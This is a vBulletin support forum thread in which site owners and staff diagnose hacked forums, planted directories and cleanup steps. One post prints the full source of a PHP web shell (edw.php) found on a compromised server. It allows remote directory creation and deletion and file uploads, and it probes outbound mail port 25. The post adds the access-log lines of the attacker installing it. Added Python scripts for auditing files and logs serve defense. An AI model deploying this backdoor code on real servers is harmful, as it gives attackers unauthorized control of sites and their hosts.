Kokosina.in - Anyone Else Getting This?

  • Simtech
    replied
    I had this too - clean install back in July 2011... users were getting alerts on ver 4.1.11.


  • TheWindows7Site
    replied
    https://www.vbulletin.com/forum/show...-How-to-remove


  • RobHW
    replied
    It looks like my forums are clean now. I was running VBulletin 4.0.8. I upgraded with a clean install to VBulletin 4.1.9. The clean install ensured that any compromised VBulletin source files were removed. During the install, once you're in the AdminCP, all of the modified templates are identified and you're given the option to revert them, which I did. This ensured that any compromised templates were corrected. I gather the vulnerability that existed in some versions, like 4.0.8, has been corrected by (or even before) the latest version 4.1.9, so I'm hopeful that this is behind me now. Google has reviewed my forums and detected no malware.

    I've added an .htaccess file in my root directory to block the IP identified in the earlier post by Wayne. I think having just the one .htaccess file in the root directory may be best. If any .htaccess files appear in sub-directories then I'll know just by their presence that they are bogus and should be deleted.

    I changed my FTP and VBulletin Admin passwords. I don't think these were compromised, but just to be careful.

    Many thanks to Wayne for the excellent and timely support.


  • Wayne Luke
    replied
    I'd recommend not running the main site under HTTPS. If you do then make sure all your settings point to the SSL version.

    For security, just the Admin CP, and it doesn't have the reliance on AJAX and Javascript that the main site does, so it will work better.


  • ramf02
    replied
    I modified the .htaccess file in the main directory to have the entire site run under ssl. I'm accepting the 'security warning', but all I get is a blank page. The new thread never posts. I can, however, reply to posts. It's just hard to pinpoint what the problem might be since I've done several things over the past few weeks to get rid of the virus and prevent my site from getting another one. Do you have any recommended actions to fix this? Any maintenance I can do on the board? Should I try re-installing 4.19? Thanks,
    Frank


  • Wayne Luke
    replied
    Originally posted by ramf02:
    Ok so I've opened up the board again and I can't seem to be able to post new threads. I can reply, though. My forum is here: https://www.richardbey.org/forums. When submitting the form to post a new thread I get this now: Although this page is encrypted, the information you have entered is to be sent over an unencrypted connection and could easily be read by a third party.

    Is it not posting because it's going through the SSL now? Thoughts? Thanks,
    Frank
    That is a browser security warning. So you would have to accept that in order to post. If you're going to run under SSL, you should make sure your entire forums run under SSL.


  • ramf02
    replied
    Ok so I've opened up the board again and I can't seem to be able to post new threads. I can reply, though. My forum is here: https://www.richardbey.org/forums. When submitting the form to post a new thread I get this now: Although this page is encrypted, the information you have entered is to be sent over an unencrypted connection and could easily be read by a third party.

    Is it not posting because it's going through the SSL now? Thoughts? Thanks,
    Frank


  • Wayne Luke
    replied
    Like I said, the contents of that folder are to install the default data that comes with the CMS. If all you had was the forum, I am not sure why you have those files.


  • ramf02
    replied
    Originally posted by Wayne Luke:
    Like I said, the jsonwrapper folder isn't a valid folder in 4.1.9 so you can probably delete. Don't know if it was added by an addon though.

    The cmsdefaultdata folder contains the information that is optionally imported when you install/upgrade the Publishing Suite. If you delete it, it won't hurt anything but it is a valid folder.
    Ok I'm deleting both of those folders. The file names in the cmsdefaultdata just seemed too odd -- like they were ads for something. I'm curious, though, what do you mean install/upgrade the publishing suite? All I have ever had was the vbulletin message board.


  • ramf02
    replied
    OK, thanks. The names of those HTML files seemed strange/foreign sounding to me, so I figured I'd ask.


  • Wayne Luke
    replied
    Like I said, the jsonwrapper folder isn't a valid folder in 4.1.9 so you can probably delete. Don't know if it was added by an addon though.

    The cmsdefaultdata folder contains the information that is optionally imported when you install/upgrade the Publishing Suite. If you delete it, it won't hurt anything but it is a valid folder.


  • ramf02
    replied
    So what should I do about the jsonwrapper directory? Delete it?

    How about the cmsdefaultdata folder? I did some digging in it and it has a ton of files. It has a subdirectory with my admin name and files such as jimm-na-russkom.html, jimm-nastroyka-nokia-6233.html, and aska-na-telefon-samsung-gt-s5230.html. What the heck are these? Parts of the virus?? Most of the files in the cmsdefaultdata folder have the same dates as the files I deleted from earlier, which leads me to believe they're part of the virus. There's also a ton of .jpgs and .pngs in the attachments subdirectory (same date as previously cleared out files) with names of 37236-37647. If these are still part of the virus then why didn't the file scanner find these? Is it because they're in directories that vbulletin isn't even looking for?


    Thanks,
    Frank


  • Wayne Luke
    replied
    Originally posted by mmavipc:
    This happened on my 4.1.9 board, the only file that the checker found without default contents was class_core.php which I modified for cloudflare.

    File found: edw.php
    Here's the log of it being created
    178.16.22.59 - - [08/Dec/2011:02:27:26 -0700] "POST /forum/commons.php HTTP/1.1" 200 89892 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
    178.16.22.59 - - [08/Dec/2011:02:27:43 -0700] "POST /forum/commons.php HTTP/1.1" 200 10162 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
    178.16.22.59 - - [08/Dec/2011:02:27:44 -0700] "POST /forum/edw.php HTTP/1.1" 200 335 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"

    I was running an old VB version back then.
    Most likely your source of infection and why we recommend customers keep their software up to date.


  • Wayne Luke
    replied
    Originally posted by ramf02:
    While deleting my files, I came across a directory that didn't seem to get checked: includes/facebook/jsonwrapper. The date is the same date as all the files I'm deleting. Should this folder exist? Same with install/cmsdefaultdata folder, and there is an index.html file in the /install folder with the date of all the suspect files. Thanks!
    There is no directory jsonwrapper in vBulletin. The /includes/facebook/ directory is valid though.

    Most directories include an index.html file. These are 0 byte empty files and put there just in case a web server has file indexing turned on for some reason. They prevent lookie-loos from seeing the contents of the individual directories.

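    Three points in the posts above describe what a template/file checker will not catch and what a defender can audit by hand: RobHW's rule that any .htaccess below the document root is suspect, Wayne's notes that index.html placeholders are 0-byte files and that includes/facebook/jsonwrapper is not a vBulletin directory, and ramf02's observation that the planted files all share one modification date. The following Python audit is an added example, not code from this thread or from vBulletin; the expected-directory list, the sample tree and its timestamps are constructed for the example, and a real audit would derive the directory and file list from the shipped package rather than a hand-written set.

```python
import os
import shutil
import tempfile
import time
from datetime import datetime, timedelta

# Directories a forum-only vBulletin 4 install is expected to contain, relative to the
# document root. Constructed and deliberately partial for this example: a real audit
# derives this set from the shipped package, not from a hand-written list.
EXPECTED_DIRS = {
    "includes", "includes/facebook", "install", "install/cmsdefaultdata",
    "images", "clientscript", "packages",
}


def audit_tree(root, bad_mtime, window=timedelta(hours=1)):
    """Walk `root` and report what a template/file checker does not look at.

    Returns (kind, relative_path) tuples for:
      unexpected_dir   - a directory absent from EXPECTED_DIRS (e.g. a planted jsonwrapper)
      nonempty_index   - an index.html placeholder that is not 0 bytes
      nested_htaccess  - an .htaccess anywhere below the document root
      mtime_cluster    - any file modified within `window` of the known-bad file
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        rel = "" if rel == "." else rel
        if rel and rel not in EXPECTED_DIRS:
            findings.append(("unexpected_dir", rel))
        for name in filenames:
            relpath = f"{rel}/{name}" if rel else name
            st = os.stat(os.path.join(dirpath, name))
            if name == "index.html" and st.st_size > 0:
                findings.append(("nonempty_index", relpath))
            if name == ".htaccess" and rel:
                findings.append(("nested_htaccess", relpath))
            if abs(datetime.fromtimestamp(st.st_mtime) - bad_mtime) <= window:
                findings.append(("mtime_cluster", relpath))
    return findings


def build_sample_tree():
    """Create a constructed tree mirroring the layout discussed in the thread.

    Timestamps are set explicitly: stock files carry an old date, planted files share
    the date of the known-bad file, which is what ramf02 noticed in cmsdefaultdata.
    """
    root = tempfile.mkdtemp(prefix="vb_audit_")
    bad_time = datetime(2011, 12, 8, 2, 27, 44)   # matches the edw.php log entry
    old_time = datetime(2011, 7, 1, 12, 0, 0)     # constructed install date
    files = {
        "index.php": (old_time, b"<?php // stock entry point (constructed)\n"),
        ".htaccess": (old_time, b"Deny from 178.16.22.59\n"),       # root-level block is expected
        "includes/index.html": (old_time, b""),                      # proper 0-byte placeholder
        "includes/facebook/index.html": (old_time, b""),
        "includes/facebook/jsonwrapper/json.php": (bad_time, b"<?php // planted (constructed)\n"),
        "install/index.html": (bad_time, b"<html>not a placeholder</html>"),
        "install/cmsdefaultdata/jimm-na-russkom.html": (bad_time, b"<html>constructed</html>"),
        "images/.htaccess": (bad_time, b"RewriteEngine On\n"),       # .htaccess below root
    }
    for relpath, (when, content) in files.items():
        full = os.path.join(root, *relpath.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
        ts = time.mktime(when.timetuple())
        os.utime(full, (ts, ts))
    return root, bad_time


def run_demo():
    """Build the sample tree, audit it, clean up, and return the sorted findings."""
    root, bad_time = build_sample_tree()
    try:
        findings = sorted(audit_tree(root, bad_time))
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return findings


if __name__ == "__main__":
    for kind, path in run_demo():
        print(f"{kind:16} {path}")
```

    The mtime cluster is the most useful of the four checks on a real box: it surfaces files in directories the checker treats as valid (cmsdefaultdata, attachments) that were written at the same moment as the known-bad file. Treat a hit as something to compare against the shipped package, not as proof on its own, since a legitimate upgrade also touches many files at once.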

  • mmavipc
    replied
    This happened on my 4.1.9 board, the only file that the checker found without default contents was class_core.php which I modified for cloudflare.

    File found: edw.php
    contents
    Code:
    <?php

    function LoadExtension($ext)
    {
        $lib = $ext.'.so';
        if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
            $lib = 'php_'.$ext.'.dll';

        if(!extension_loaded($ext))
        {
            if(!dl($lib))
                return FALSE;
        }
        return TRUE;
    }

    function Check25Port()
    {
        $res = TRUE;
        $s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if(@socket_connect($s, 'mxs.mail.ru', 25) == FALSE)
            $res = FALSE;
        socket_close($s);
        return $res;
    }

    function Check()
    {
        // Version >= 4.1.0
        if(strnatcmp(phpversion(), '4.1.0') < 0)
            return FALSE;
        // Check for safe mode
        //if(ini_get('safe_mode'))
        //    return FALSE;
        // Check 'sockets' ext
        if(!LoadExtension('sockets'))
            return FALSE;
        // Check 25 port
        if(!Check25Port())
            return FALSE;

        return TRUE;
    }

    function RemoveDir($dir)
    {
      $res = FALSE;
      if(is_dir($dir))
      {
        $objects = scandir($dir);
        foreach($objects as $object)
        {
          if($object != "." && $object != "..")
          {
            if(filetype($dir."/".$object) == "dir")
              RemoveDir($dir."/".$object);
            else
              unlink($dir."/".$object);
          }
        }
        reset($objects);
        $res = rmdir($dir);
      }
      return $res;
    }

    function Upload($dir)
    {
      $res = move_uploaded_file($_FILES["file"]["tmp_name"], $dir.'/'.$_FILES["file"]["name"]);
      return $res;
    }

    function Work()
    {
      $type = $_POST['type'];
      $res  = FALSE;

      echo('EDW');
      if($type == 'check')
      {
        $res  = Check();
      }
      else if($type == 'mkdir')
      {
        $dir  = $_POST['dir'];
        $res  = mkdir($dir);
      }
      else if($type == 'rmdir')
      {
        $dir  = $_POST['dir'];
        $res  = RemoveDir($dir);
      }
      else if($type == 'upload')
      {
        $dir  = $_POST['dir'];
        $res  = Upload($dir);
      }

      if($res)
        echo('OK');
      else
        echo('FAILED');
    }

    Work();

    ?>
    Here's the log of it being created
    178.16.22.59 - - [08/Dec/2011:02:27:26 -0700] "POST /forum/commons.php HTTP/1.1" 200 89892 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
    178.16.22.59 - - [08/Dec/2011:02:27:43 -0700] "POST /forum/commons.php HTTP/1.1" 200 10162 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
    178.16.22.59 - - [08/Dec/2011:02:27:44 -0700] "POST /forum/edw.php HTTP/1.1" 200 335 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"

    I was running an old VB version back then.
    Last edited by mmavipc; Thu 5 Jan '12, 11:34pm.

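    The three access-log lines mmavipc posted show the pattern worth hunting for in any web log: a burst of POSTs from one client to a script, then a POST to a file name that never appeared before. The following Python triage script is an added example, not part of this thread or of vBulletin: it parses Apache combined-log lines, groups them by client, and reports POSTs to scripts outside an allowlist that follow other POSTs from the same client within a short window. The allowlist and the two benign 203.0.113.7 lines are constructed for the example; the three 178.16.22.59 lines are the ones from the post.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format:
# host ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The three lines mmavipc posted, plus two constructed benign lines (203.0.113.7) for contrast.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Dec/2011:02:20:01 -0700] "GET /forum/index.php HTTP/1.1" 200 51234 "-" "Mozilla/5.0 (constructed)"
178.16.22.59 - - [08/Dec/2011:02:27:26 -0700] "POST /forum/commons.php HTTP/1.1" 200 89892 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
178.16.22.59 - - [08/Dec/2011:02:27:43 -0700] "POST /forum/commons.php HTTP/1.1" 200 10162 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
178.16.22.59 - - [08/Dec/2011:02:27:44 -0700] "POST /forum/edw.php HTTP/1.1" 200 335 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
203.0.113.7 - - [08/Dec/2011:02:31:10 -0700] "POST /forum/newreply.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (constructed)"
"""

# Scripts the forum is expected to receive POSTs to. Constructed and partial for this
# example; a real allowlist is built from the files shipped in the vBulletin package.
KNOWN_POST_TARGETS = {
    "/forum/index.php", "/forum/login.php", "/forum/newreply.php",
    "/forum/newthread.php", "/forum/ajax.php",
}


def parse_log(text):
    """Parse combined-log lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["status"] = int(e["status"])
        entries.append(e)
    return entries


def find_dropper_chains(entries, window_seconds=120):
    """Per client IP, report POSTs to scripts outside the allowlist that follow
    another POST from the same client within `window_seconds`.

    In the posted log this matches the chain commons.php -> commons.php -> edw.php:
    edw.php is first requested one second after the last POST to commons.php.
    """
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e["ip"]].append(e)

    findings = []
    for ip, reqs in by_ip.items():
        reqs.sort(key=lambda e: e["ts"])
        for i, e in enumerate(reqs):
            if e["method"] != "POST" or e["path"] in KNOWN_POST_TARGETS:
                continue
            prior = [
                p for p in reqs[:i]
                if p["method"] == "POST"
                and (e["ts"] - p["ts"]).total_seconds() <= window_seconds
            ]
            if not prior:
                continue
            findings.append({
                "ip": ip,
                "path": e["path"],
                "ts": e["ts"].isoformat(),
                "seconds_after_first_post": int((e["ts"] - prior[0]["ts"]).total_seconds()),
                "prior_paths": sorted({p["path"] for p in prior}),
            })
    return findings


if __name__ == "__main__":
    for f in find_dropper_chains(parse_log(SAMPLE_LOG)):
        print(f"{f['ip']} POST {f['path']} {f['seconds_after_first_post']}s after "
              f"first POST to {', '.join(f['prior_paths'])}")
```

    Run against the sample, the script reports the POST to /forum/edw.php eighteen seconds after the first POST from the same client, with /forum/commons.php as the only prior target. The second POST to commons.php is reported too, because commons.php is not in the constructed allowlist; whether it belongs there is decided by comparing against the shipped package, which is exactly the comparison Wayne's file checker performs for file contents and this script performs for request targets.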